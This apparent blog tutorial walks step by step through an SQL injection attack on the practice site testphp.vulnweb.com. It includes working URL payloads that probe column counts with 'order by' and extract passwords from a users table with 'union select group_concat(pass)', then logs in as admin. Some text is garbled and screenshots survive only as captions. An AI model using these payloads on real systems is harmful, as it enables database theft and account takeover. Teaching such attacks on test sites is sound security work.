Hack Database Through Web Browser

                 Hack Database Through Web Browser

                                            SQL Injection Attack I


In sql injection attack , attacker inserts malicious sql statements to control database of web application

Sample website – testphp.vulnweb.com

Step 1 – Get a link in web application


Hack Database Using Web Browser

Hack Database Using Web Browser


Step 2 – Check For error message


Hack Database Using Web Browser

In above figure , we can see that server is providing sql error message . It indicates that website is vulnerable to sql injection.


Step 3 – Get Information about number of columns inweb application

http://testphp.vulnweb.com/artists.php?artist=1orderby 1—

http://testphp.vulnweb.com/artists.php?artist=1orderby 2–

http://testphp.vulnweb.com/artists.php?artist=1orderby 3-

http://testphp.vulnweb.com/artists.php?artist=1orderby 4–

http://testphp.vulnweb.com/artists.php?artist=1orderby 5—


Now using 1,2,3  we are getting webpage but on 4 it changes . it means that there are 3 columns

Hack Database Using Web Browser


Hack Database Using Web Browser


Step 4 – Get Information about Tables in database-



Hack Database Using Web Browser




Step 5 – Get Information about Columns in users table –

We found table names in previous step. NEdit Siteow pick one table – user from it and find columns


Hack Database Using Web Browser



Step 6 – Get Username and password from uname and pass column –

We found column names in previous step. Now pick columns and find data inside it.


Find Username –


Hack Database Using Web Browser



Find Password –

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,group_concat(pass) from users–

Hack Database Using Web Browser


Step 7 – Now login in website as admin –

Open http://testphp.vulnweb.com/login.php page and type username – test and password – test

Hack Database Using Web Browser


Hack Database Using Web Browser


You can see in above figure that we have successfully logged in as admin using sql injection attack.



Similar articles:

Hack Database Using Kali Linux Tool (SQLMAP)

List of Best SQL Injection Tools

SQL Injection Attack


Web Jacking & Domain Name Hijacking


Olalekan Admin

Cyber Security Engineer